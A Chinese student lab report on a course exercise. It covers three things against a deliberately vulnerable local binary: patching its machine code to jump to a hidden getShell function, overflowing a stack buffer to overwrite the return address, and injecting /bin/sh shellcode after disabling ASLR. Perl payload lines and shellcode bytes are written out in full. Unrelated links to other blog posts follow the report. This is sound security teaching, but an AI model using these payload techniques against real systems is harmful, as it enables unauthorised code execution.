2018-2019 20165226 网络对抗 Exp1 PC平台逆向破解
2018-2019 20165226 网络对抗 Exp1 PC平台逆向破解
目录
一、逆向及Bof基础实践说明
二、直接修改程序机器指令,改变程序执行流程
三、通过构造输入参数,造成BOF攻击,改变程序执行流
四、注入Shellcode并执行
五、问题与思考
一、逆向及Bof基础实践说明
****
1.1 实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
- 三个实践内容如下:
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。- 这几种思路,基本代表现实情况中的攻击目标:
- 运行原本不可访问的代码片段
- 强行修改程序执行流
- 以及注入运行任意代码。
1.2 基础知识
NOP, JNE, JE, JMP, CMP汇编指令的机器码
NOP
:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)JNE
:条件转移指令,如果不相等则跳转。(机器码:75)JE
:条件转移指令,如果相等则跳转。(机器码:74)JMP
:无条件转移指令。段内直接短转Jmp short(机器码:EB) 段内直接近转移Jmp near(机器码:E9) 段内间接转移 Jmp word(机器码:FF) 段间直接(远)转移Jmp far(机器码:EA)CMP
:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
Linux基本操作
objdump -d
:从objfile中反汇编那些特定指令机器码的section。perl -e
:后面紧跟单引号括起来的字符串,表示在命令行要执行的命令。xxd
:为给定的标准输入或者文件做一次十六进制的输出,它也可以将十六进制输出转换为原来的二进制格式。ps -ef
:显示所有进程,并显示每个进程的UID,PPIP,C与STIME栏位。|
:管道,将前者的输出作为后者的输入。>
:输入输出重定向符,将前者输出的内容输入到后者中。
我们通过输入
chmod +x pwn1
将pwn1文件加高亮
二、直接修改程序机器指令,改变程序执行流程
****
> 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
> 学习目标:理解可执行文件与机器指令
> 进阶:掌握ELF文件格式,掌握动态技术
- 使用objdump -d pwn1将pwn1反汇编,得到以下代码
可以看出
80484b5: e8 d7 ff ff ff call 8048491 <foo>
这条汇编指令,在main
函数中调用位于地址8048491
处的foo
函数,e8
表示“call”
,即跳转。
如果我们想让函数调用
getShell
,只需要修改d7 ff ff ff
即可。根据foo函数
与getShell
地址的偏移量,我们计算出应该改为c3 ff ff ff
。
修改具体如下:
vi pwn1
进入命令模式输入
:%!xxd
将显示模式切换为十六进制在底行模式输入/e8d7定位需要修改的地方,并确认
进入插入模式,修改d7为c3
输入
:%!xxd -r
将十六进制转换为原格式
- 使用
:wq!
保存并退出 - 反汇编查看修改后的代码,发现call指令正确调用getShell:
三、通过构造输入参数,造成BOF攻击,改变程序执行流
> 知识要求:堆栈结构,返回地址 学习目标:理解攻击缓冲区的结果,掌握返回地址的获取 进阶:掌握ELF文件格式,掌握动态技术
- 反汇编,具体操作参考上一步骤,此处不再赘述
- 该可执行文件正常运行是调用函数foo,这个函数有Buffer overflow漏洞。读入字符串时,系统只预留了一定字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址。尝试发现,当输入为以下字符时已经发生段错误,产生溢出:
使用gdb进行调试:
由此可得eip的值为ASCII的5,即输入字符串的“5”的部分发生溢出,我们可以尝试将5
的部分换成12345678
进一步确认:
由此看来1234覆盖了堆栈的返回地址。因此,我们可以尝试将这四个字符替换成getShell
的内存地址并输给20165226pwn2,20165226pwn2就会运行getshell。
- 反汇编查看getshell的内存地址:
由此可知应输入
11111111222222223333333344444444\x7d\x84\x04\x08
使用perl命令构造文件
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
使用十六进制查看指令
xxd
查看input文件。\0a表示换行
将input的输入通过
|
管道符,作为20165226pwn2的输入
四、注入Shellcode并执行
> - hellcode就是一段机器指令(code)
- 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
- 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
- 首先使用
apt-get install execstack
安装execstack - 修改一下设置
root@kali:~/20165226/exp1# execstack -s 20165226pwn3
root@kali:~/20165226/exp1# execstack -q 20165226pwn3
X 20165226pwn3
root@kali:~/20165226/exp1# more /proc/sys/kernel/randomize_va_space
2
root@kali:~/20165226/exp1# echo "0" > /proc/sys/kernel/randomize_va_space
root@kali:~/20165226/exp1# more /proc/sys/kernel/randomize_va_space
0
采用RNS方法攻击buf(retaddr+nop+shellcode)
perl -e 'print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode
在第一个终端用
(cat input_shellcode;cat) | ./20165226pwn3
注入攻击,回车后保持这个终端不动,打开另一个终端另一个终端
ps -df |grep 20165226pwn3
查看 其进程号为3292
gdb调试进程
启动gdb,
attach 3292
调试此进程
通过设置断点disassemble foo
来查看注入buf的内存地址
使用break *0x080484ae
设置断点,并输入c
(continue)继续运行。在20165226pwn3进程正在运行的终端敲回车,使其继续执行。再返回调试终端,使用info r esp
查找地址。
使用x/16x 0xffffd2ec
查看其存放内容,看到了01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,所以地址是0xffffd2f0
。
- 回到第一个终端
- 输入命令
perl -e 'print "A" x 32;print "\xf0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
- 再用
(cat input_shellcode;cat) | ./20165226pwn3
命令次执行程序,攻击成功!
- 输入命令
五、问题与思考
- 问题1:ebd7找不到
![](https://img2018.cnblogs.com/blog/1047870/201903/1047870-20190311232448517-112338069.png)
问题1解决方案:输入
/e8 d7
(注意中间空格)
问题2:在另一个终端中无法查看显示20165226pwn3这个进程的进程号
问题2解决方案:
仔细比对步骤,发现写好的代码未成功通过管道方式对文件中foo函数进行覆盖,重新输入(cat input_shellcode;cat) | ./pwn2
问题3:出现以下情况
问题3解决方案;两个终端分别运行时将20165226pwn3文件提前结束运行了,当第一次使用cat语句执行后应该保持不动。
返回目录
2018-2019 20165226 网络对抗 Exp1 PC平台逆向破解的更多相关文章
- 20155305《网络对抗》PC平台逆向破解(二)
20155305<网络对抗>PC平台逆向破解(二) shellcode注入 1.shellcode shellcode是一段代码,溢出后,执行这段代码能开启系统shell. 2.构造方法 ...
- 20155311《网络对抗》PC平台逆向破解(二)
20155311<网络对抗>PC平台逆向破解(二) shellcode注入 什么是shellcode? shellcode是一段代码,溢出后,执行这段代码能开启系统shell. 前期准备- ...
- 2015531 网络攻防 Exp1 PC平台逆向破解(5)M
2015531 网络攻防 Exp1 PC平台逆向破解(5)M 实践目标 本次实践的对象是linux的可执行文件 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串 ...
- 20145330 《网络对抗》PC平台逆向破解:注入shellcode 和 Return-to-libc 攻击实验
20145330 <网络对抗>PC平台逆向破解:注入shellcode 实验步骤 1.用于获取shellcode的C语言代码 2.设置环境 Bof攻击防御技术 需要手动设置环境使注入的sh ...
- 20145221《网络对抗》PC平台逆向破解
20145221<网络对抗>PC平台逆向破解 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户 ...
- 20155307《网络对抗》PC平台逆向破解(二)
20155307<网络对抗>PC平台逆向破解(二) shellcode注入 什么是shellcode? shellcode是一段代码,溢出后,执行这段代码能开启系统shell. 前期准备- ...
- 20145312 《网络对抗》PC平台逆向破解:注入shellcode和 Return-to-libc 攻击实验
20145312 <网络对抗>PC平台逆向破解:注入shellcode和 Return-to-libc 攻击实验 注入shellcode 实验步骤 1. 准备一段Shellcode 2. ...
- 20145201李子璇《网络对抗》PC平台逆向破解
20145201<网络对抗>PC平台逆向破解 准备阶段 下载安装execstack. 获取shellcode的c语言代码 设置堆栈可执行 将环境设置为:堆栈可执行.地址随机化关闭(2开启, ...
- 20145219《网络对抗》PC平台逆向破解
20145219<网络对抗>PC平台逆向破解 shellcode注入 1.shellcode shellcode是一段代码,溢出后,执行这段代码能开启系统shell. 2.构造方法 (1) ...
随机推荐
- 2.4 C++成员选择符
参考:http://www.weixueyuan.net/view/6336.html 总结: 访问可以通过成员选择符“.”或指针操作符“->”来完成. 通过上一节的学习我们看到:通过对象可以访 ...
- 注解实现struts2零配置
零配置指的是不经过配置文件struts.xml配置Action 首先:导入jar struts2-convention-plugin-2.3.24.1.jar package com.action ...
- 可远程定位、解锁并启动汽车的黑客设备OwnStar
GM告诉WIRED,OnStar用户不必担心之前存在的问题,现在已经修复了之前可被利用的漏洞,. 然而,Kamkar表示问题还是没有被解决,并且已经由GM汇报了该问题. 在任何已经连接的汽车上,GM的 ...
- 解压Ubuntu的initrd.img的方法
Ubuntu的initrd.img可以在/boot中找到,通常文件名后面还跟有很长的一串版本号. 为了保险起见,不直接操作原文件,而是把它复制到自己的家目(home)录中.如果你是用root帐号登录的 ...
- grafana的一些坑
坑1: 在设置alert的时候template中的变量是不被支持的,警告如下: 解决办法: 使用不带变量的具体sql查询 坑2: 时间轴的设置: 在更早的版本中时间轴的locale是无法设置的,就是说 ...
- H - 【59】Lazier Salesgirl 模拟//lxm
Kochiya Sanae is a lazy girl who makes and sells bread. She is an expert at bread making and selling ...
- 分析苹果代充产业链 汇率差+退款造就三线城市千万富翁_中新游戏研究_Joynews中新游戏
分析苹果代充产业链 汇率差+退款造就三线城市千万富翁_中新游戏研究_Joynews中新游戏 CNG:近日有媒体曝出8月22日这一天,有一家淘宝店卖出了351张面值4000南非南特的App Store ...
- Android利用反射机制为实体类属性赋值
在做android项目时,有时会遇到从网络上获取json类型数据,赋值给实体类,实体类属性少可以一个一个的赋值,如果实体类有很多属性,赋值可能就要耗很长的功夫了,幸好Java给我们提供了反射机制.下面 ...
- STM32串口配置步骤
串口设置的一般步骤可以总结为如下几个步骤: 1) 串口时钟使能, GPIO 时钟使能2) 串口复位3) GPIO 端口模式设置4) 串口参数初始化5) 开启中断并且初始化 NVIC(如果需要开启中断才 ...
- Word所有字体按比例缩小
ctrl + [ 不然每次都要一部分一部分的修改啊